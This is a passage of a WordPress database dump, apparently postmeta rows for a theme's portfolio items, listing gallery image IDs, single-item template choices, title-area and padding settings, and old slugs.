tical_header_background_image_meta','no'),(5287,1789,'qodef_disable_header_widget_logo_area_meta','no'),(5288,1789,'qodef_disable_header_widget_menu_area_meta','no'),(5289,1789,'slide_template','default'),(5290,1789,'_wpb_vc_js_status','true'),(5291,1789,'qodef_title_area_type_meta','breadcrumbs'),(5292,1789,'qodef_page_content_top_padding','76'),(5293,1789,'qodef_page_content_top_padding_mobile','yes'),(5294,1789,'qodef_title_area_height_meta','140'),(5295,1789,'qodef_title_area_title_tag_meta','h2'),(5296,1789,'_wp_old_slug','full-width-images'),(5297,1789,'_wp_old_slug','full-width-images-2'),(5298,1789,'_wp_old_slug','images'),(5299,1789,'_wp_old_slug','big-images'),(5300,1789,'_wp_old_slug','small-images'),(5301,1789,'_wp_old_slug','slider'),(5302,1789,'_wp_old_slug','big-slider'),(5303,1789,'_wp_old_slug','big-slider-2'),(5304,1789,'_wp_old_slug','small-slider'),(5305,1789,'_wp_old_slug','small-slider-2'),(5306,1789,'_wp_old_slug','small-gallery'),(5307,1789,'_wp_old_slug','small-gallery-2'),(5308,1789,'qodef_portfolio_single_gallery_columns_number_meta','two'),(5309,1789,'_thumbnail_id','2794'),(5310,1789,'_dp_original','1544'),(5311,1789,'_wp_old_slug','possibility-2'),(5312,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5313,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5314,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5315,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5316,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5317,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5318,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5319,1790,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5320,1790,'qodef_page_content_behind_header_meta','no'),(5321,1790,'qodef_boxed_background_image_attachment_meta','fixed'),(5322,1790,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(5323,1790,'qodef_portfolio_single_template_meta','gallery'),(5324,1790,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5325,1790,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5326,1790,'portfolio_single_back_to_link','1730'),(5327,1790,'qodef_disable_vertical_header_background_image_meta','no'),(5328,1790,'qodef_disable_header_widget_logo_area_meta','no'),(5329,1790,'qodef_disable_header_widget_menu_area_meta','no'),(5330,1790,'slide_template','default'),(5331,1790,'_wpb_vc_js_status','true'),(5332,1790,'qodef_title_area_type_meta','breadcrumbs'),(5333,1790,'qodef_page_content_top_padding','76'),(5334,1790,'qodef_page_content_top_padding_mobile','yes'),(5335,1790,'qodef_title_area_height_meta','140'),(5336,1790,'qodef_title_area_title_tag_meta','h2'),(5337,1790,'_wp_old_slug','full-width-images'),(5338,1790,'_wp_old_slug','full-width-images-2'),(5339,1790,'_wp_old_slug','images'),(5340,1790,'_wp_old_slug','big-images'),(5341,1790,'_wp_old_slug','small-images'),(5342,1790,'_wp_old_slug','slider'),(5343,1790,'_wp_old_slug','big-slider'),(5344,1790,'_wp_old_slug','big-slider-2'),(5345,1790,'_wp_old_slug','small-slider'),(5346,1790,'_wp_old_slug','small-slider-2'),(5347,1790,'_wp_old_slug','big-gallery'),(5348,1790,'_wp_old_slug','big-gallery-2'),(5349,1790,'_thumbnail_id','2773'),(5350,1790,'_dp_original','1543'),(5351,1790,'_wp_old_slug','different-2'),(5352,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5353,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5354,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5355,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5356,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5357,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5358,1791,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5359,1791,'qodef_page_content_behind_header_meta','no'),(5360,1791,'qodef_boxed_background_image_attachment_meta','fixed'),(5361,1791,'qodef-portfolio-image-gallery','1435,1434,1445'),(5362,1791,'qodef_portfolio_single_template_meta','small-slider'),(5363,1791,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5364,1791,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5365,1791,'portfolio_single_back_to_link','1730'),(5366,1791,'qodef_disable_vertical_header_background_image_meta','no'),(5367,1791,'qodef_disable_header_widget_logo_area_meta','no'),(5368,1791,'qodef_disable_header_widget_menu_area_meta','no'),(5369,1791,'slide_template','default'),(5370,1791,'_wpb_vc_js_status','true'),(5371,1791,'qodef_title_area_type_meta','breadcrumbs'),(5372,1791,'qodef_page_content_top_padding','76'),(5373,1791,'qodef_page_content_top_padding_mobile','yes'),(5374,1791,'qodef_title_area_height_meta','140'),(5375,1791,'qodef_title_area_title_tag_meta','h2'),(5376,1791,'_wp_old_slug','full-width-images'),(5377,1791,'_wp_old_slug','full-width-images-2'),(5378,1791,'_wp_old_slug','images'),(5379,1791,'_wp_old_slug','big-images'),(5380,1791,'_wp_old_slug','small-images'),(5381,1791,'_wp_old_slug','slider'),(5382,1791,'_wp_old_slug','big-slider'),(5383,1791,'_wp_old_slug','big-slider-2'),(5384,1791,'_wp_old_slug','small-slider'),(5385,1791,'_wp_old_slug','small-slider-2'),(5386,1791,'_thumbnail_id','2792'),(5387,1791,'_dp_original','1542'),(5388,1791,'_wp_old_slug','freemind-2'),(5389,1793,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5390,1793,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5391,1793,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5392,1793,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5393,1793,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5394,1793,'qodef_page_content_behind_header_meta','no'),(5395,1793,'qodef_boxed_background_image_attachment_meta','fixed'),(5396,1793,'qodef-portfolio-image-gallery','1435,1434,1445'),(5397,1793,'qodef_portfolio_single_template_meta','small-images'),(5398,1793,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5399,1793,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5400,1793,'portfolio_single_back_to_link','1730'),(5401,1793,'qodef_disable_vertical_header_background_image_meta','no'),(5402,1793,'qodef_disable_header_widget_logo_area_meta','no'),(5403,1793,'qodef_disable_header_widget_menu_area_meta','no'),(5404,1793,'slide_template','default'),(5405,1793,'_wpb_vc_js_status','true'),(5406,1793,'qodef_title_area_type_meta','breadcrumbs'),(5407,1793,'qodef_page_content_top_padding','76'),(5408,1793,'qodef_page_content_top_padding_mobile','yes'),(5409,1793,'qodef_title_area_height_meta','140'),(5410,1793,'qodef_title_area_title_tag_meta','h2'),(5411,1793,'_wp_old_slug','full-width-images'),(5412,1793,'_wp_old_slug','full-width-images-2'),(5413,1793,'_wp_old_slug','images'),(5414,1793,'_wp_old_slug','big-images'),(5415,1793,'_wp_old_slug','small-images'),(5416,1793,'_wp_old_slug','small-images-2'),(5417,1793,'_thumbnail_id','2795'),(5418,1793,'_dp_original','1540'),(5419,1793,'_wp_old_slug','opposite-2'),(5420,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5421,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5422,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5423,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5424,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5425,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5426,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5427,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5428,1797,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5429,1797,'qodef_page_content_behind_header_meta','no'),(5430,1797,'qodef_boxed_background_image_attachment_meta','fixed'),(5431,1797,'qodef-portfolio-image-gallery','4280,4278,4335,4333,3377'),(5432,1797,'qodef_portfolio_single_template_meta','masonry'),(5433,1797,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5434,1797,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5435,1797,'portfolio_single_back_to_link','1730'),(5436,1797,'qodef_disable_vertical_header_background_image_meta','no'),(5437,1797,'qodef_disable_header_widget_logo_area_meta','no'),(5438,1797,'qodef_disable_header_widget_menu_area_meta','no'),(5439,1797,'slide_template','default'),(5440,1797,'_wpb_vc_js_status','true'),(5441,1797,'qodef_title_area_type_meta','breadcrumbs'),(5442,1797,'qodef_page_content_top_padding','76'),(5443,1797,'qodef_page_content_top_padding_mobile','yes'),(5444,1797,'qodef_title_area_height_meta','140'),(5445,1797,'qodef_title_area_title_tag_meta','h2'),(5446,1797,'_wp_old_slug','full-width-images'),(5447,1797,'_wp_old_slug','full-width-images-2'),(5448,1797,'_wp_old_slug','images'),(5449,1797,'_wp_old_slug','big-images'),(5450,1797,'_wp_old_slug','small-images'),(5451,1797,'_wp_old_slug','slider'),(5452,1797,'_wp_old_slug','big-slider'),(5453,1797,'_wp_old_slug','big-slider-2'),(5454,1797,'_wp_old_slug','small-slider'),(5455,1797,'_wp_old_slug','small-slider-2'),(5456,1797,'_wp_old_slug','small-gallery'),(5457,1797,'_wp_old_slug','big-masonry'),(5458,1797,'qodef_portfolio_single_gallery_columns_number_meta','two'),(5459,1797,'qodef_portfolio_single_masonry_space_between_items_meta','normal'),(5460,1797,'_thumbnail_id','2791'),(5461,1797,'_dp_original','1463'),(5462,1797,'_wp_old_slug','vegan-2'),(5463,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5464,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5465,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5466,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5467,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5468,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5469,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5470,1798,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5471,1798,'qodef_page_content_behind_header_meta','no'),(5472,1798,'qodef_boxed_background_image_attachment_meta','fixed'),(5473,1798,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(5474,1798,'qodef_portfolio_single_template_meta','small-gallery'),(5475,1798,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5476,1798,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5477,1798,'portfolio_single_back_to_link','1730'),(5478,1798,'qodef_disable_vertical_header_background_image_meta','no'),(5479,1798,'qodef_disable_header_widget_logo_area_meta','no'),(5480,1798,'qodef_disable_header_widget_menu_area_meta','no'),(5481,1798,'slide_template','default'),(5482,1798,'_wpb_vc_js_status','true'),(5483,1798,'qodef_title_area_type_meta','breadcrumbs'),(5484,1798,'qodef_page_content_top_padding','76'),(5485,1798,'qodef_page_content_top_padding_mobile','yes'),(5486,1798,'qodef_title_area_height_meta','140'),(5487,1798,'qodef_title_area_title_tag_meta','h2'),(5488,1798,'_wp_old_slug','full-width-images'),(5489,1798,'_wp_old_slug','full-width-images-2'),(5490,1798,'_wp_old_slug','images'),(5491,1798,'_wp_old_slug','big-images'),(5492,1798,'_wp_old_slug','small-images'),(5493,1798,'_wp_old_slug','slider'),(5494,1798,'_wp_old_slug','big-slider'),(5495,1798,'_wp_old_slug','big-slider-2'),(5496,1798,'_wp_old_slug','small-slider'),(5497,1798,'_wp_old_slug','small-slider-2'),(5498,1798,'_wp_old_slug','small-gallery'),(5499,1798,'qodef_portfolio_single_gallery_columns_number_meta','two'),(5500,1798,'_thumbnail_id','2790'),(5501,1798,'_dp_original','1459'),(5502,1798,'_wp_old_slug','organic-2'),(5503,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5504,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5505,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5506,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5507,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5508,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5509,1799,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5510,1799,'qodef_page_content_behind_header_meta','no'),(5511,1799,'qodef_boxed_background_image_attachment_meta','fixed'),(5512,1799,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(5513,1799,'qodef_portfolio_single_template_meta','gallery'),(5514,1799,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5515,1799,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5516,1799,'portfolio_single_back_to_link','1730'),(5517,1799,'qodef_disable_vertical_header_background_image_meta','no'),(5518,1799,'qodef_disable_header_widget_logo_area_meta','no'),(5519,1799,'qodef_disable_header_widget_menu_area_meta','no'),(5520,1799,'slide_template','default'),(5521,1799,'_wpb_vc_js_status','true'),(5522,1799,'qodef_title_area_type_meta','breadcrumbs'),(5523,1799,'qodef_page_content_top_padding','76'),(5524,1799,'qodef_page_content_top_padding_mobile','yes'),(5525,1799,'qodef_title_area_height_meta','140'),(5526,1799,'qodef_title_area_title_tag_meta','h2'),(5527,1799,'_wp_old_slug','full-width-images'),(5528,1799,'_wp_old_slug','full-width-images-2'),(5529,1799,'_wp_old_slug','images'),(5530,1799,'_wp_old_slug','big-images'),(5531,1799,'_wp_old_slug','small-images'),(5532,1799,'_wp_old_slug','slider'),(5533,1799,'_wp_old_slug','big-slider'),(5534,1799,'_wp_old_slug','big-slider-2'),(5535,1799,'_wp_old_slug','small-slider'),(5536,1799,'_wp_old_slug','small-slider-2'),(5537,1799,'_wp_old_slug','big-gallery'),(5538,1799,'_thumbnail_id','2789'),(5539,1799,'_dp_original','1444'),(5540,1799,'_wp_old_slug','forgiveness-2'),(5541,1800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5542,1800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5543,1800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5544,1800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5545,1800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5546,1800,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5547,1800,'qodef_page_content_behind_header_meta','no'),(5548,1800,'qodef_boxed_background_image_attachment_meta','fixed'),(5549,1800,'qodef-portfolio-image-gallery','1435,1434,1445'),(5550,1800,'qodef_portfolio_single_template_meta','small-slider'),(5551,1800,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5552,1800,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5553,1800,'portfolio_single_back_to_link','1730'),(5554,1800,'qodef_disable_vertical_header_background_image_meta','no'),(5555,1800,'qodef_disable_header_widget_logo_area_meta','no'),(5556,1800,'qodef_disable_header_widget_menu_area_meta','no'),(5557,1800,'slide_template','default'),(5558,1800,'_wpb_vc_js_status','true'),(5559,1800,'qodef_title_area_type_meta','breadcrumbs'),(5560,1800,'qodef_page_content_top_padding','76'),(5561,1800,'qodef_page_content_top_padding_mobile','yes'),(5562,1800,'qodef_title_area_height_meta','140'),(5563,1800,'qodef_title_area_title_tag_meta','h2'),(5564,1800,'_wp_old_slug','full-width-images'),(5565,1800,'_wp_old_slug','full-width-images-2'),(5566,1800,'_wp_old_slug','images'),(5567,1800,'_wp_old_slug','big-images'),(5568,1800,'_wp_old_slug','small-images'),(5569,1800,'_wp_old_slug','slider'),(5570,1800,'_wp_old_slug','big-slider'),(5571,1800,'_wp_old_slug','big-slider-2'),(5572,1800,'_wp_old_slug','small-slider'),(5573,1800,'_thumbnail_id','2788'),(5574,1800,'_dp_original','1442'),(5575,1800,'_wp_old_slug','fulfillment-2'),(5576,1801,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5577,1801,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5578,1801,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5579,1801,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5580,1801,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5581,1801,'qodef_page_content_behind_header_meta','no'),(5582,1801,'qodef_boxed_background_image_attachment_meta','fixed'),(5583,1801,'qodef-portfolio-image-gallery','1435,1434,1445'),(5584,1801,'qodef_portfolio_single_template_meta','slider'),(5585,1801,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5586,1801,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5587,1801,'portfolio_single_back_to_link','1730'),(5588,1801,'qodef_disable_vertical_header_background_image_meta','no'),(5589,1801,'qodef_disable_header_widget_logo_area_meta','no'),(5590,1801,'qodef_disable_header_widget_menu_area_meta','no'),(5591,1801,'slide_template','default'),(5592,1801,'_wpb_vc_js_status','true'),(5593,1801,'qodef_title_area_type_meta','breadcrumbs'),(5594,1801,'qodef_page_content_top_padding','76'),(5595,1801,'qodef_page_content_top_padding_mobile','yes'),(5596,1801,'qodef_title_area_height_meta','140'),(5597,1801,'qodef_title_area_title_tag_meta','h2'),(5598,1801,'_wp_old_slug','full-width-images'),(5599,1801,'_wp_old_slug','full-width-images-2'),(5600,1801,'_wp_old_slug','images'),(5601,1801,'_wp_old_slug','big-images'),(5602,1801,'_wp_old_slug','small-images'),(5603,1801,'_wp_old_slug','slider'),(5604,1801,'_wp_old_slug','big-slider'),(5605,1801,'_thumbnail_id','2787'),(5606,1801,'_dp_original','1440'),(5607,1801,'_wp_old_slug','tasty-2'),(5608,1801,'_wp_old_slug','diference'),(5609,1802,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5610,1802,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5611,1802,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5612,1802,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5613,1802,'qodef_page_content_behind_header_meta','no'),(5614,1802,'qodef_boxed_background_image_attachment_meta','fixed'),(5615,1802,'qodef-portfolio-image-gallery','1435,1434,1445'),(5616,1802,'qodef_portfolio_single_template_meta','small-images'),(5617,1802,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5618,1802,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5619,1802,'portfolio_single_back_to_link','1730'),(5620,1802,'qodef_disable_vertical_header_background_image_meta','no'),(5621,1802,'qodef_disable_header_widget_logo_area_meta','no'),(5622,1802,'qodef_disable_header_widget_menu_area_meta','no'),(5623,1802,'slide_template','default'),(5624,1802,'_wpb_vc_js_status','true'),(5625,1802,'qodef_title_area_type_meta','breadcrumbs'),(5626,1802,'qodef_page_content_top_padding','76'),(5627,1802,'qodef_page_content_top_padding_mobile','yes'),(5628,1802,'qodef_title_area_height_meta','140'),(5629,1802,'qodef_title_area_title_tag_meta','h2'),(5630,1802,'_wp_old_slug','full-width-images'),(5631,1802,'_wp_old_slug','full-width-images-2'),(5632,1802,'_wp_old_slug','images'),(5633,1802,'_wp_old_slug','big-images'),(5634,1802,'_wp_old_slug','small-images'),(5635,1802,'_thumbnail_id','2786'),(5636,1802,'_dp_original','1438'),(5637,1802,'_wp_old_slug','calm-2'),(5638,3211,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5639,3211,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5640,3211,'qodef_page_content_behind_header_meta','no'),(5641,3211,'qodef_boxed_background_image_attachment_meta','fixed'),(5642,3211,'qodef-portfolio-image-gallery','1435,1434,1445'),(5643,3211,'qodef_portfolio_single_template_meta','huge-images'),(5644,3211,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5645,3211,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5646,3211,'portfolio_single_back_to_link','1730'),(5647,3211,'qodef_disable_vertical_header_background_image_meta','no'),(5648,3211,'qodef_disable_header_widget_logo_area_meta','no'),(5649,3211,'qodef_disable_header_widget_menu_area_meta','no'),(5650,3211,'slide_template','default'),(5651,3211,'_wpb_vc_js_status','true'),(5652,3211,'qodef_title_area_type_meta','breadcrumbs'),(5653,3211,'qodef_page_content_top_padding','76'),(5654,3211,'qodef_page_content_top_padding_mobile','yes'),(5655,3211,'qodef_title_area_height_meta','140'),(5656,3211,'qodef_title_area_in_grid_meta','no'),(5657,3211,'qodef_title_area_title_tag_meta','h2'),(5658,3211,'_thumbnail_id','2756'),(5659,3211,'_wp_old_slug','full-width-images'),(5660,3211,'_dp_original','1433'),(5661,3212,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5662,3212,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5663,3212,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5664,3212,'qodef_page_content_behind_header_meta','no'),(5665,3212,'qodef_boxed_background_image_attachment_meta','fixed'),(5666,3212,'qodef-portfolio-image-gallery','1435,1434,1445'),(5667,3212,'qodef_portfolio_single_template_meta','images'),(5668,3212,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5669,3212,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5670,3212,'portfolio_single_back_to_link','1730'),(5671,3212,'qodef_disable_vertical_header_background_image_meta','no'),(5672,3212,'qodef_disable_header_widget_logo_area_meta','no'),(5673,3212,'qodef_disable_header_widget_menu_area_meta','no'),(5674,3212,'slide_template','default'),(5675,3212,'_wpb_vc_js_status','true'),(5676,3212,'qodef_title_area_type_meta','breadcrumbs'),(5677,3212,'qodef_page_content_top_padding','76'),(5678,3212,'qodef_page_content_top_padding_mobile','yes'),(5679,3212,'qodef_title_area_height_meta','140'),(5680,3212,'qodef_title_area_title_tag_meta','h2'),(5681,3212,'_wp_old_slug','full-width-images'),(5682,3212,'_wp_old_slug','full-width-images-2'),(5683,3212,'_wp_old_slug','images'),(5684,3212,'_wp_old_slug','big-images'),(5685,3212,'_thumbnail_id','708'),(5686,3212,'_dp_original','1437'),(5687,3212,'_wp_old_slug','softness-2'),(5688,3213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5689,3213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5690,3213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5691,3213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5692,3213,'qodef_page_content_behind_header_meta','no'),(5693,3213,'qodef_boxed_background_image_attachment_meta','fixed'),(5694,3213,'qodef-portfolio-image-gallery','1435,1434,1445'),(5695,3213,'qodef_portfolio_single_template_meta','small-images'),(5696,3213,'qodef_portfolio_masonry_fixed_dimensions_meta','large-height'),(5697,3213,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5698,3213,'portfolio_single_back_to_link','1730'),(5699,3213,'qodef_disable_vertical_header_background_image_meta','no'),(5700,3213,'qodef_disable_header_widget_logo_area_meta','no'),(5701,3213,'qodef_disable_header_widget_menu_area_meta','no'),(5702,3213,'slide_template','default'),(5703,3213,'_wpb_vc_js_status','true'),(5704,3213,'qodef_title_area_type_meta','breadcrumbs'),(5705,3213,'qodef_page_content_top_padding','76'),(5706,3213,'qodef_page_content_top_padding_mobile','yes'),(5707,3213,'qodef_title_area_height_meta','140'),(5708,3213,'qodef_title_area_title_tag_meta','h2'),(5709,3213,'_wp_old_slug','full-width-images'),(5710,3213,'_wp_old_slug','full-width-images-2'),(5711,3213,'_wp_old_slug','images'),(5712,3213,'_wp_old_slug','big-images'),(5713,3213,'_wp_old_slug','small-images'),(5714,3213,'_dp_original','1438'),(5715,3213,'_wp_old_slug','calm-2'),(5716,3213,'_thumbnail_id','3376'),(5717,3214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5718,3214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5719,3214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5720,3214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5721,3214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5722,3214,'qodef_page_content_behind_header_meta','no'),(5723,3214,'qodef_boxed_background_image_attachment_meta','fixed'),(5724,3214,'qodef-portfolio-image-gallery','1435,1434,1445'),(5725,3214,'qodef_portfolio_single_template_meta','slider'),(5726,3214,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5727,3214,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5728,3214,'portfolio_single_back_to_link','1730'),(5729,3214,'qodef_disable_vertical_header_background_image_meta','no'),(5730,3214,'qodef_disable_header_widget_logo_area_meta','no'),(5731,3214,'qodef_disable_header_widget_menu_area_meta','no'),(5732,3214,'slide_template','default'),(5733,3214,'_wpb_vc_js_status','true'),(5734,3214,'qodef_title_area_type_meta','breadcrumbs'),(5735,3214,'qodef_page_content_top_padding','76'),(5736,3214,'qodef_page_content_top_padding_mobile','yes'),(5737,3214,'qodef_title_area_height_meta','140'),(5738,3214,'qodef_title_area_title_tag_meta','h2'),(5739,3214,'_wp_old_slug','full-width-images'),(5740,3214,'_wp_old_slug','full-width-images-2'),(5741,3214,'_wp_old_slug','images'),(5742,3214,'_wp_old_slug','big-images'),(5743,3214,'_wp_old_slug','small-images'),(5744,3214,'_wp_old_slug','slider'),(5745,3214,'_wp_old_slug','big-slider'),(5746,3214,'_thumbnail_id','710'),(5747,3214,'_dp_original','1440'),(5748,3214,'_wp_old_slug','tasty-2'),(5749,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5750,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5751,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5752,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5753,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5754,3215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5755,3215,'qodef_page_content_behind_header_meta','no'),(5756,3215,'qodef_boxed_background_image_attachment_meta','fixed'),(5757,3215,'qodef-portfolio-image-gallery','1435,1434,1445'),(5758,3215,'qodef_portfolio_single_template_meta','small-slider'),(5759,3215,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5760,3215,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5761,3215,'portfolio_single_back_to_link','1730'),(5762,3215,'qodef_disable_vertical_header_background_image_meta','no'),(5763,3215,'qodef_disable_header_widget_logo_area_meta','no'),(5764,3215,'qodef_disable_header_widget_menu_area_meta','no'),(5765,3215,'slide_template','default'),(5766,3215,'_wpb_vc_js_status','true'),(5767,3215,'qodef_title_area_type_meta','breadcrumbs'),(5768,3215,'qodef_page_content_top_padding','76'),(5769,3215,'qodef_page_content_top_padding_mobile','yes'),(5770,3215,'qodef_title_area_height_meta','140'),(5771,3215,'qodef_title_area_title_tag_meta','h2'),(5772,3215,'_wp_old_slug','full-width-images'),(5773,3215,'_wp_old_slug','full-width-images-2'),(5774,3215,'_wp_old_slug','images'),(5775,3215,'_wp_old_slug','big-images'),(5776,3215,'_wp_old_slug','small-images'),(5777,3215,'_wp_old_slug','slider'),(5778,3215,'_wp_old_slug','big-slider'),(5779,3215,'_wp_old_slug','big-slider-2'),(5780,3215,'_wp_old_slug','small-slider'),(5781,3215,'_thumbnail_id','2757'),(5782,3215,'_dp_original','1442'),(5783,3215,'_wp_old_slug','fulfillment-2'),(5784,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5785,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5786,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5787,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5788,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5789,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5790,3216,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5791,3216,'qodef_page_content_behind_header_meta','no'),(5792,3216,'qodef_boxed_background_image_attachment_meta','fixed'),(5793,3216,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,